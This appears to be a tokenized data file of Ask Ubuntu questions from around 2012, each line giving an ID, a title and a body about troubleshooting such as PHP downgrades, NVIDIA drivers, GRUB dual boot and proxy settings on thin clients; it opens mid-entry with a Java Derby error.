root @ dur : ~/apache-james-3.0-beta4/var/store/derby # java org.apache.derby.tools.ij exception in thread `` main '' java.lang.noclassdeffounderror : org/apache/derby/tools/ij caused by : java.lang.classnotfoundexception : org.apache.derby.tools.ij at java.net.urlclassloader $ 1.run ( urlclassloader.java:217 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:205 ) at java.lang.classloader.loadclass ( classloader.java:321 ) at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:294 ) at java.lang.classloader.loadclass ( classloader.java:266 ) could not find the main class : org.apache.derby.tools.ij . program will exit . root @ dur : ~/apache-james-3.0-beta4/var/store/derby # why does n't the other console work ?
179640	ca n't get rid of php 5.4.4	i recently upgraded from php 5.3.4 to php 5.4.4 , and now i want to downgrade . i removed all the packages through apt-get remove php5 after removing the repository , and then ran apt-get install php5 but still , apache ca n't start now and the error log shows : [ thu aug 23 19:01:10 2012 ] [ notice ] apache/2.2.17 ( ubuntu ) php/5.4.4-4~natty+1 configured -- resuming normal operations i even ran this to make sure there is no more 5.4.4 : root @ server : ~ # apt-cache policy php5 php5 : installed : 5.3.5-1ubuntu7.10 candidate : 5.3.5-1ubuntu7.10 version table : *** 5.3.5-1ubuntu7.10 0 500 http : //us.archive.ubuntu.com/ubuntu/ natty-updates/main i386 packages 500 http : //security.ubuntu.com/ubuntu/ natty-security/main i386 packages 100 /var/lib/dpkg/status 5.3.5-1ubuntu7 0 500 http : //us.archive.ubuntu.com/ubuntu/ natty/main i386 packages how do i fix this ?
179644	how do i write applets for cinnamon ?	i 'm very excited about the cinnamon desktop environment and want to write applets for it . how can this be done ? where can i find information and tutorials about it ? ( i have searched in google , but was unable to find any examples ) thanks for the help !
179647	how to get netradio working in firefox	i listen to a danish stateowned netradio , but i can not get it working . i have installed the adobe flashplayer , but apparently there are some problems with the plugin , so when i push the playbutton nothing at all happens , and none of the other browsers work either .
179648	change wifi roaming aggressiveness	is there any way to change roaming aggressiveness ? we are having issues at our school with clients running 12.04 losing connection when hopping between two nearby ap using the same ssid
179661	can not change window border theme in mate	i 'm trying to change the window border theme from appearance settings but it 's not working . if i use marco instead of compiz it works so is this a compiz problem ?
179666	how do i change the default format of a shape ( drawing object ) in impress	when i create a new rectangle from the drawing toolbar in openoffice impress 3.4.1 , it has really ugly formatting ( line color , line width , and fill color ) . i believe i inadvertently changed the default formatting for the shape . how do i change the formatting to a style i like better ? fwiw , the way to do it in powerpoint is to right-click on an object whose format you like and select `` set as default shape '' .
179669	how to share files on virtualbox with windows as a guest ?	i read this but the instructions were for 10.04 and does not apply in my case .
179676	dual monitor configuration , maximizing spreads between monitors	i connected an external monitor ( dell ultrasharp 18 inch ) to my laptop ( laptop screen 15.4 inches ) . when i maximize a window in any monitor , it immediately spreads between both monitors in an uneven fashion due to the different resolutions in them . can i avoid the window from spreading between the two monitors ? i just want to maximize in individual monitors . previously , when i was using ubuntu 11.10 , the monitors got automatically configured the way i wanted . but then i had not installed the propriety ati/amd drivers and i was running unity 2d but now i am running unity 3d . is this issue related to the propriety ati/amd drivers and unity 3d ? i installed the prpriety ati/amd drivers y following this link http : //ubuntuportal.com/2012/03/new-ati-catalyst-12-3-has-been-released-how-to-install-in-ubuntu-12-04-and-linux-mint-12.html i also tried this how can i stop a window maximizing across two screens ? it did n't help . fyi , lspci output 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) 00:1c.2 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 3 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati seymour [ radeon hd 6400m series ] 07:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) 0d:00.0 network controller : intel corporation centrino wireless-n 1000 13:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5116 pci express card reader ( rev 01 ) 19:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 04 ) fglrxinfo output display : :0.0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 6400m series opengl version string : 4.2.11566 compatibility profile context any help would be great . thanks
179679	how do i make network configuration changes permanent ?	i managed to get 12.0.4 cloud server with maas installed . i have no gui , and i like it that way i am learning a lot . but now i 'm running into several issues . i want to be able to make my ip static but that 's just part of the issue , following the help document does n't help . i try to go to etc/network/interfaces and it says it does n't exist . i have made it as far as etc/network but it wont go to interfaces , even though ls shows it is there . now , how do i do multiple lines of something ? right now i 'm with the ethtool it says to do this : i want to be clear , i actually have ethtool installed . changes made with the ethtool command are temporary and will be lost after a reboot . if you would like to retain settings , simply add the desired ethtool command to a pre-up statement in the interface configuration file /etc/network/interfaces . the following is an example of how the interface identified as eth0 could be permanently configured with a port speed of 1000mb/s running in full duplex mode . auto eth0 iface eth0 inet static pre-up /sbin/ethtool -s eth0 speed 1000 duplex full what does that mean pre-up statement ? when i try to type this in , it never works auto eth0 retuns me with an error saying no command auto found . this is something similar to what i have to do to get static going . i just ca n't seem to find anything on this subject matter anywhere . even like the most basics of linux help .
179680	can i replace the windows bootloader with grub ?	i recently installed 12.04 via the windows installer , and i was wondering if it was possible to install grub2 and use that instead of the windows 7 boot-loader ? the windows boot-loader works fine , however the windows mscofig application can not see the partition ( as it 's code is not designed to detect linux partition types ( ext2 , hpfs etc . ) i ran fdisk -l and it returned : disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x10a444cc device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 1416081407 707937280 7 hpfs/ntfs/exfat /dev/sda3 1416081408 1465147391 24532992 27 hidden ntfs winre
179681	how do i use the `` cd '' command ?	i am using precise pangolin . so far as i know , commands like cd.. or cd- are used to browse through folders in the terminal . but whenever i enter one of this commands , it gives an error saying no such command or filename found . do i have to perform any additional task before i use the commands involving cd ?
179682	ubuntu 12.04 stuck at logo with 5 dots on macbook pro	i have an old macbook pro 4,1 , which i had loaded with 12.04 when it was released . yesterday i took out the laptop and applied some 480mb of updates and rebooted . since then it is stuck at the ubuntu logo with 5 dots . i 've waited for about half n hour but it does n't proceed . i 've tried hitting 'e ' key during booting but it does n't get me into edit mode . from online forums and blogs , this seems like a graphic driver issue ( nvidia-current ) but i 'm not sure how to get to console or boot menu to do something . here 's what happens - a light blue screen ( mac boot screen ) appears when i power on mbp only ubuntu is installed on the laptop , so it directly tries to boot ubuntu i get a blank screen with an underscore flashing on top-left corner of the screen then i get a blank purple screen for about 5-6 seconds before getting the ubuntu logo with 5 dots it gets stuck on the logo screen forever how do i proceed on this ? thanks in advance .
179689	mac os x wo n't boot from grub menu in ubuntu precise on apple mba ( 5,2 )	i have set up ubuntu precise on the new 2012 edition of the apple mba ( 5,2 ) following the excellent guide over here . now i want to uninstall refit , in order to avoid going over the boot options twice . the boot options are displayed via refit and grub in that order . however to do so , i must be able to boot into mac os x via grub . at the moment this is not happening . i read somewhere that this requires chainloading . could someone direct me to get this right ? thanks in advance !
179696	how do i download a flash player ?	i only just installed ubuntu and i 'm trying to watch movies and videos online but it wo n't let me since i do n't have the right plugins installed . i tried to download adobe flash player but it wo n't download .
179697	storage partition - problem with dual boot	i recently installed ubuntu 12.04 . i 'm dual booting with windows 7 , and i have a ntfs partition for storage . when i save files to the storage partition in ubuntu and reboot into windows , i ca n't see the files and windows does n't recognize that the space is being used ( it showed the same amount of free space left in the partition as before saving the files ) . moreover , when i reboot back into ubuntu , i 'm unable to see those files either , but the amount of free space left in the drive is as if the files that i initially saved are still there . there 's no problem with viewing files that i put into that partition from windows . i followed the instructions on http : //www.howtogeek.com/howto/35807/how-to-harmonize-your-dual-boot-setup-for-windows-and-ubuntu/ to set up the storage partition . some help with how to get at those files ( from both windows and ubuntu ) would be greatly appreciated . thanks in advance .
179701	shoud i use java/eclipse 32 or 64-bit in ubuntu 64-bit ?	i have ubuntu 64-bit . so i should use java/eclipse 32 or 64-bit ? i think java 64-bit is a little heavy .
179703	ca n't install wine on 12.04 x64	i ca n't get wine to install , it keeps say there are unmet dependencies . sudo apt-get install wine reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.5 but it is not going to be installed e : unable to correct problems , you have held broken packages . this is a fresh install .
179706	unable to install macbuntu	i downloaded macbuntu from http : //sourceforge.net/projects/macbuntu/ i extracted it in downloads folder , and then i dble-clicked `` install.sh '' ( macbuntu-10.10 folder ) . when prompted , i clicked run in terminal . immediately the terminal window appeared on the screen for a second , and disappeared . nothing happened after that . i was trying to follow the instructions posted in this link : http : //www.howtogeek.com/45817/how-to-make-ubuntu-linux-look-like-mac-os-x/ ( i am on ubuntu 12.04 ) can someone point me to the right direction ?
179712	.exe file created by c programming through gcc compiler is n't executing	i am using ubuntu 12.04 on my desktop and ubuntu 11.04 on laptop . i am writing c program which contains math . i am creating executable file through the command : gcc -o filename.exe filename.c -lm ( compilation ) this will create a filename.exe file . i can now execute it through terminal command : ./filename.exe ( execution ) i have laptop . it has ubuntu 11.04 . i store files in ntfs partition . these sequence of commands works well in my laptop . but if same file i copy in my desktop 's ntfs partition , which is ubuntu 12.04 and then runs then it does n't work . it compiles but does n't executes . i am getting the answer : bash : ./filename.exe : permission denied i searched in internet . they suggested that you can change the permission of file by below command : chmod u+x filename.exe but i got same answer : permission denied . i tried manually through gui through property -- > permission -- > checking `` allow executing file as program '' and that is not working . it uncheckes automatically . i searched in the internet and i got answer that it is not advisable to change permission for every file each and every time of execution . better you can change permission of entire ntfs partition by following command : chmod -r 777 /media/partition ( where partition is ntfs type . ) this is supposed to change the partition permission to rw and executable mode . but this is also not solving my problem .
179716	creating a new user does n't include features of cmd ?	i created a new user using the following command : sudo useradd -m jkeesh sudo passwd jkeesh everything is working fine . i can able to log in and to do other stuffs . but in the command line , i 'm missing the ability and features of real ubuntu . what i mean is , when i tried to move to end of the command using my direction keys , i get this : ^ [ [ a^ [ [ a^ [ [ d^ [ [ d^ [ [ d^ [ [ b^ [ [ c and there is no auto completion . hitting the tab key does n't help . where i 'm making the mistake ? i 'm very new to ubuntu , i need some help .
179717	how to remove wine internet explorer option from open with menu ?	i use xubuntu 12.04.1 lts ( xfce ) with thunar file manager . i ran this command : rm ~/.local/share/applications/wine-extension-jpe.desktop and one wine context menu item has gone . how do i remove the other one ?
179718	do i need to reinstall my 12.04 desktop to get 12.04.1 , which was released today ?	the first lts i ever installed was this latest one . i got word that the maintenance update 12.04.1 was released today . should i download precise again from ubuntu ? or are all the updates since april covered in this latest release ?
179720	how do i add emblems to folders ?	12.04 home folder icons have small extra figures in the right bottom . example : the icon for the `` downloads '' folder has a small arrow figure . in 10.04 i was able to add these figures to icons of own generated folders . i could do this by right click the icon and these select the small figure i wanted from a pull down list . how can this be done in 12.04 ?
179728	what is ubuntu 's ip reassembly timeout ?	i 've been told the ip reassembly timeout is 30 seconds , but i just need some clarification please it 'll be great if it was from ubuntu too , as i need to reference it ! thanks
179729	can i install google chrome and chromium together ?	can i install google chrome browser and chromium together in ubuntu ? are there any known conflicts when i install both of them together ?
179730	webcam detected but not showing up	i 'm using acer 4530 with suyin webcam . the webcam can be detected but not showing anything . before i start anything , i ran lsof /dev/video0 to make sure nothing is using the camera , and i started cheese but the screen shows black and nothing . i execute lsof /dev/video0 again and it shows cheese is using it . i exited cheese and opened up vlc . the device showed in the playlist but not the image that the camera used to show . long time ago , it was running fine , but after that it stop working and then my graphic card are down . after the graphic card fix , the webcam came up again but now it stop working again . is there any hardware problem or it 's just software problem ?
179734	how can i update 12.04 without update manager ?	when i try to update ubuntu - i know that i have 233 updates - i get this message every time : unable to get exclusive lock this usually means that another package management application ( like apt-get or aptitude ) already running . please close that application first . and i do n't find this application .
179736	how to install 12.04 on samsung series 5 ultrabook ?	a few days ago , i bought this laptop , and now i want to change its os ( windows 7 ) to ubuntu but failed . i burn it to a usb stick , set bios to startup from usb and it worked . i followed the install steps to install ubuntu , it was a success . but when i restart the computer after installation , it 's not working , it 'll be continual reboot at start up until i shutdown or let it start up from usb stick . can anybody to tell me this is why ? please help me to resolve it .
179737	is there any way to recover my sudo power ?	i created a new user and changed the ssh config . i forgot to add root permission to the newly created user . now i need to undo my changes in ssh config . is that possible without any sudo command ?
179738	unable to install ubuntu on asus eeepc1011cx : bios not listing bootable usbs	i had been trying to install ubuntu 12.4lts on my netbook eee pc 1011cx with preloaded windows7 . i successfully created a bootable usb stick ( http : //www.ubuntu.com/download/help/create-a-usb-stick-on-windows ) following pendrivelinux.com then with esc key at powering up , i could pick the bootable usb and load ubuntu successfully . ubuntu loads , so far so good . now i decide to install it `` within win7 '' dual boot . now here is the issue : with esc key , i could see that there are three devices listed to pick : ( 1 ) the main sat drive , ( 2 ) generic usb 0.0 , ( 3 ) uefi generic usb 0.0 -- out of these three , options ( 1 ) and ( 3 ) load win7 , and ( 2 ) is what loads ubuntu . but when i get into bios using f2 key to change the boot order , i see only device options ( 1 ) and ( 3 ) listed there . option ( 2 ) `` generic usb 0.0 '' is missing . so : the system can not reboot into ubuntu during installation process and the process is terminated every time the system restarts . installation does n't proceed even if i manually pick to install using esc key . is there anyway to ask bios to show the generic usb option ? i have tested the usb on another machine , and also i have tried doing the same procedure using an ext.hdd only to see the same trend . please advice . thanks .
179746	how do i secure my ssh access ?	so i have a vps , and i have no idea how to administer it . i understand one of the first things to do is secure it , and the first concrete step in that direction i 've found so far is in moshen 's comment : also , you should secure your ssh access as soon as possible . i recommend changing the default port , using key-based authentication and disabling password authentication and root logins ( basically create a standard user account for you to log in with ) so far , all i know how to do is use my vps provider 's web interface to open a console with root access . so how do i follow moshen 's advice ?
179758	dual boot with encrypted windows partition	i tried to make the windows option on grub boot menu the default by following the instructions i found on the internet . the instructions were good , graceful but since i encrypted the windows partition after i installed ubuntu , the graceful approach did n't work for me when i did update-grub . the option simply disappeared because decryption does not work under ubuntu . i found on the internet some codes for grub.conf to restore windows startup . it was successful but there is an error message after i select the windows option . i wonder whether update-grub automatically backs up a copy of grub.conf or any other config files it changes ? if so , i can probably retrieve that config and get rid of the error message . i did n't mean to encrypt , it 's a company pc and encryption of windows partition is mandatory . i do not want to decrypt the windows partition , fix grub and encrypt again - it simply takes too much time .
179759	is this external drive ( verbatim 47564 320gb ) recognized by linux ?	i 'm buying this drive : http : //www.techfuels.com/hard-disk/8068-verbatim-47564-320gb-external-usb-hard-drive.html because of transition from windows 7 to linux ( mint/ubuntu ) and i want to save my files from windows 7 ( movies , pictures etc . ) does anyone know something about linux 's support for this piece of hardware ?
179763	remmina server & remmina client	i am a total beginner . i am totally frustrated in partial answers and i am unable to understand and the alphabet soup . the answers just confuse me . the instructions say to do this , but i have no idea how to do this . what fits in each of the required setup fields ? how do i find out the correct format and data that each field requires ? there is nothing i have been able to find that explains the basics of setting up remmina between two computers over the internet where the ipv4 addresses are known . is the connection secure ( encrypted en-route ) ? where is the server to be located or is the client also the server ? any assistance would be helpful . the two computers are ubuntu 12.04 32 located in argentina and ubuntu 12.04 amd64 located in the states ( both are in america ) . my first problem starts under 'profile ' : 'name ' may anything may go here ? 'group ' since there will be only the two ends , does group require an entry ? 'protocol ' which would be best and which would be default supported by both ends ? 'basic ' that should be the computer in the states , but what name should apply and in what format ? does it require a domain name or will an ip address suffice ? 'advanced ' seems the server must initiate the contact as 'client name ' 'startup program ' 'startup path ' fields are requested . what goes in each field and in what format ? 'ssh ' tunnel ? does that require a separate setup or is that built into either or both the server and client ? where is the server ? and how do i get it ? or is it built into the client ? what is the server-client relationship ? or are they interchangeable ?
179764	ca n't install windows	i try to boot from the windows xp disc and it wont let me , it says there is no harddrive , when i do have a hard drive . i just want to uninstall ubuntu and get windows .
179767	my ubuntu 12.04 lts slowed down	my ubuntu 12.04 lts worked fine for few months after i installed it . but it has now slowed down considerably . for example : initially it took about only 2 or 3 seconds to load lebreoffice writer , but now it takes about 15 seconds to load the same . i properly update essential security updates . my hardware : 2gb memory and 2.3 ghz processor ( intel i5 ) what may have gone wrong ? any ideas please ?
179771	changes made in gconf-editor have no effect	i 'm running ubuntu 12.04 lts with gnome 3.4.2 . changes i make in `` gconf-editor '' have no effect in gnome , but they do when i load gnome classic . for example , changing the order and position of caption buttons had no effect ( they remained where they were ) , but when i logged out and entered gnome classic , it changed . also , suddenly , when i try to adjust font hinting ( from `` slight '' to `` full '' ) in `` advanced settings '' , nothing happens . i tried making changes both as a normal user and as root , both without luck .
179772	use the google chrome 21 flash plugin in firefox in ubuntu 12.04	i see several link for doing this : can i use the same built in flash library from chrome in firefox ? http : //helpdeskgeek.com/how-to/use-the-google-chrome-flash-plugin-in-firefox-in-ubuntu/ but there is not any libgcflashplugin.so or libflashplayergc.so in /opt/google/chrome directory ( in google chrome 21 ) . i find /opt/google/chrome/pepperflash/libpepflashplayer.so and create a link to /.mozilla/plugins/ but firefox did not know it as a plugin . how can i use the google chrome 21 flash plugin in firefox ( 14 ) in ubuntu 12.04 . thanks .
179780	is there a feed reader with web interface and desktop client ?	i 'm looking for a feed reader that has both : web-interface and a standalone client for the dektop . like that , i could read my feeds from every omputer with an internet connection and from my pc even if i 'm currently offline . both interfaces should sync . i 'm know there are google reader clients ( at least one ) but i do n't want to rely on a company to host the common database and the web-interface . i 'd like the server part to be open-source , too . is there something like this out there ?
179782	problems with the screen	i 've just installed 12.04 lts on my laptop and i 'm having some problems with the screen . whenever i change from a window to another , the screen seems like it had stripes ; but after two or three seconds , it works in a normal way . the same thing happens when i 'm writing on the keyboard happens , so i ca n't see if i 'm writing right or not . i 've tried to install the additional controllers that appear on the system configuration menu , but when i click on the activate , after a minute or so appears a message saying : we are sorry , the installation of the driver failed : check the log to see the details : /var/log/jockey.log . there are two additional controllers : fglrx propietary graphics driver for ati/amd ( post-release updates ) fglrx propietary graphics driver for ati/amd my computer is a toshiba satellite l850-150 . i hope you can help me .
179784	updated server from 10.04 to 12.04 . still boot from old kernel	i have just finished a succesfully upgrade from 10.04.4 to 12.04.1 on my remote server . after reboot , i have verified that it is still booting from the old kernel : $ uname -a linux socrates 2.6.32-41-generic-pae # 94-ubuntu smp fri jul 6 17:08:20 utc 2012 i686 i686 i386 gnu/linux i have also run update-grub : $ sudo update-grub searching for grub installation directory ... found : /boot/grub searching for default file ... found : /boot/grub/default testing for an existing grub menu.lst file ... found : /boot/grub/menu.lst searching for splash image ... none found , skipping ... found kernel : /boot/vmlinuz-3.2.0-29-generic-pae found kernel : /boot/vmlinuz-2.6.32-41-generic-pae found grub 2 : /boot/grub/core.img found kernel : /boot/memtest86+.bin updating /boot/grub/menu.lst ... done but it is still booting from the old one ... i have verified that i am still running grub legacy : dpkg -l grub* | grep ii ii grub 0.97-29ubuntu66 grand unified bootloader ( legacy version ) ii grub-common 1.99-21ubuntu3.1 grand unified bootloader ( common files )
179785	what is process `` /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch -background none '' ?	i am experiencing some serious performance issues with my ubuntu 12.04 setup and thus looking for the culprit by running htop alongside my usual tasks . aside from the usual suspects like chromium , compiz and conky , i noticed this process : /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch -background none not only is it running constantly , but it 's also one of the main ressource hogs in the process list , both in regards of cpu usage as well as memory consumption . it 's the number one performance eater most of the time , only topped from time to time by an especially ressource-hungry task like flash player or the like . judging by the name , i 'm totally unsure what it does . x and lightdm seem to indicate a relation to the gui while tcp seems network related . my question ( s ) : is this process supposed to run all the time ? is it legit that it uses this much ressources ? do i need it to run or is it safe to kill , if so , how to ? fyi : my system is completely up-to-date , i 'm even using the xorg-edgers ppa for the very latest nvidia drivers and compiz-packages ( for specific bug-related reasons ) . any suggestions would be very much appreciated .
179787	nvidia vga drivers or card issue	my computer shows windows in a somewhat tired manner : ) it is a desktop with an onboard intel card but with a discrete nvidia card in a pci slot . the intel card is disabled in bios . somebody suggested to run glxgears and i got this kind of an error ... $ glxgears xlib : extension `` glx '' missing on display `` :0 '' . error : could n't get an rgb , double-buffered visual other information that might help are as follows $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.1 lts release : 12.04 codename : precise $ sudo lshw -c video *-display description : display controller product : 82g33/g31 express integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 10 width : 32 bits clock : 33mhz capabilities : msi pm bus_master cap_list configuration : driver=i915 latency=0 resources : irq:42 memory : fdf00000-fdf7ffff ioport : f400 ( size=8 ) memory : a0000000-afffffff memory : fdc00000-fdcfffff *-display unclaimed description : vga compatible controller product : gt218 [ geforce 8400 gs ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:06:00.0 version : a2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list configuration : latency=0 resources : memory : fb000000-fbffffff memory : b0000000-bfffffff memory : ce000000-cfffffff ioport : ef00 ( size=128 ) memory : c0000000-c007ffff $ jockey-text -l xorg : nvidia_current - nvidia accelerated graphics driver ( proprietary , disabled , not in use ) xorg : nvidia_current_updates - nvidia accelerated graphics driver ( post-release updates ) ( proprietary , disabled , not in use ) $ lspci 00:00.0 host bridge : intel corporation 82g33/g31/p35/p31 express dram controller ( rev 10 ) 00:02.0 display controller : intel corporation 82g33/g31 express integrated graphics controller ( rev 10 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 01 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gb/gr ( ich7 family ) lpc interface bridge ( rev 01 ) 00:1f.2 ide interface : intel corporation n10/ich7 family sata controller [ ide mode ] ( rev 01 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 01 ) 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 01 ) 05:00.0 pci bridge : plx technology , inc. pex8112 x1 lane pci express-to-pci bridge ( rev aa ) 06:00.0 vga compatible controller : nvidia corporation gt218 [ geforce 8400 gs ] ( rev a2 ) 06:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 ) i just want to know if its normal that glxgears should fail or there is some configuration issue with my computer .. tried this nothing happened .. sudo apt-add-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current and then tried this and this happened : ) $ sudo jockey-text -e xorg : nvidia_current sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log $ tail -20 /var/log/jockey.log 2012-08-24 19:09:13,652 debug : nvidia ( nvidia_current ) .enabled ( ) : target_alt /usr/lib/nvidia-current/ld.so.conf current_alt /usr/lib/nvidia-current/ld.so.conf other target alt /usr/lib/nvidia-current/alt_ld.so.conf other current alt /usr/lib/nvidia-current/alt_ld.so.conf 2012-08-24 19:09:13,652 debug : kmh enabled : false 2012-08-24 19:09:14,308 warning : modinfo for module nvidia_current failed : error : modinfo : could not find module nvidia_current 2012-08-24 19:09:14,308 error : xorgdriverhandler.enable ( ) : package or module not installed , aborting 2012-08-24 19:09:46,485 debug : nvidia ( nvidia_current ) .enabled ( ) : target_alt /usr/lib/nvidia-current/ld.so.conf current_alt /usr/lib/nvidia-current/ld.so.conf other target alt /usr/lib/nvidia-current/alt_ld.so.conf other current alt /usr/lib/nvidia-current/alt_ld.so.conf 2012-08-24 19:09:46,485 debug : kmh enabled : false 2012-08-24 19:09:46,513 debug : nvidia ( nvidia_current ) .enabled ( ) : target_alt /usr/lib/nvidia-current/ld.so.conf current_alt /usr/lib/nvidia-current/ld.so.conf other target alt /usr/lib/nvidia-current/alt_ld.so.conf other current alt /usr/lib/nvidia-current/alt_ld.so.conf 2012-08-24 19:09:46,513 debug : kmh enabled : false
179788	how will be the lts support for xubuntu after 3 years ?	hi : ) i 'm comfortable with xubuntu 12.04 because i have an older computer , but i was reading about the lts support : ubuntu 12.04 : supported until april 2017 . xubuntu 12.04 : supported until april 2015 . i want a 5 years support , then my question is : will be those 3 years support just for xfce packages or for all packages ? i want ask : after 3 years , will xubuntu have updates for packages as firefox , libreoffice , kernel ... ? if the answer is no ( i suppose it ) , i could change the 'apt ' repositories , from 'xubuntu ' to 'ubuntu ' . how do you see this solution ?
179790	xmonad and panels in gnome-shell	i run 12.04 with gnome-shell ( so it looks like gnome 2 with horizontal panels on the top and the bottom of the screen ) with xmonad . what i want to do is create a keybinding that would toggle these panels , basically switching applications on the screen to fullscreen and back . can anyone tell me what should i write in xmonad.hs in order to achieve it ? ( i 'm totally innocent of haskell , unfortunately . )
179798	proxy settings do not promulgate to fat or thin clients	i work in hertfordshire schools , which use a proxy eg http : //wf1.thegrid.org.uk on port 80 to allow graded access by all users , within the schools , to the internet . i have ubuntu 10.04lts successfully running and i want to set up 12.04lts to replace it . many other replies to this question have answered questions about stand-alone computers and not addressed the ltsp server and its clients . i have come to a complete stop over the problem of the proxy server settings not promulgating over the local network to ubuntu 12.04 thin or fat clients . when you input this setting ( there are others for https and ftp ) into the system settings/network manager gui on the server , then when a user logs into the server , both firefox and chrome can read the settings and will gain access to the internet . however , these settings are not promulgated to either thin or fat clients on the local network . their system settings/network manager gui remains stubbornly blank . i have rebuilt the image after inputting the proxy settings , but it appears they are not part of the image . /etc/environment ( on the server ) already has : path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games '' http_proxy= '' http : //wf1.thegrid.org.uk:80/ '' https_proxy= '' https : //wf1.thegrid.org.uk:80/ '' ftp_proxy= '' ftp : //proxy.intra.thegrid.org.uk:3128/ '' i have also tried this export http_proxy= '' http : //wf1.thegrid.org.uk:80 '' export https_proxy= '' http : //wf1.thegrid.org.uk:80 '' export ftp_proxy= '' http : //proxy.intra.thegrid.org.uk:3128 '' within /etc/environment , and that had no effect , either . etc/apt/apt.conf also has : acquire : :http : :proxy `` http : //wf1.thegrid.org.uk:80/ '' ; acquire : :https : :proxy `` https : //wf1.thegrid.org.uk:80/ '' ; acquire : :ftp : :proxy `` ftp : //proxy.intra.thegrid.org.uk:3128/ '' ; the clients still have no proxy settings in their network manager , and no client user can access the internet from firefox or chrome . three questions : why does n't the âapply system wideâ button work ? it does on 10.04 , and every new user , and all existing users have access to the internet through the proxy without problem . how can i set up proxy settings that work for all the 12.04 clients ? i noticed that if user west input the settings himself , they would follow him around the clients . however , this is not secure , because there are grades of settings which prevent visits to various sites , eg wf3 allows fewer sites than wf2 or wf1 , so i ca n't allow users to input this setting themselves . since the proxy setting followed the user around the clients , the setting must be somewhere in the user profile , since none of the other users have the proxy settings . do you know where , and how i could fix the setting for users , or better , groups ? the setting must then be unchangeable by the user , with no access to the network manager . if either 2. or 3. ca n't be done , then the ubuntu 12.04lts server is simply no use to us ...
179799	where is the devices menu of a windows virtual machine ?	i want to install guest additions in a virtual windows 7 running inside ubuntu . the virtualbox instructions are : in the `` devices '' menu in the virtual machine 's menu bar , virtualbox has a handy menu item named `` install guest additions '' , which mounts the guest additions iso file inside your virtual machine . a windows guest should then automatically start the guest additions installer , which installs the guest additions into your windows guest . how do i get to the `` devices '' menu in the virtual machine 's menu bar ?
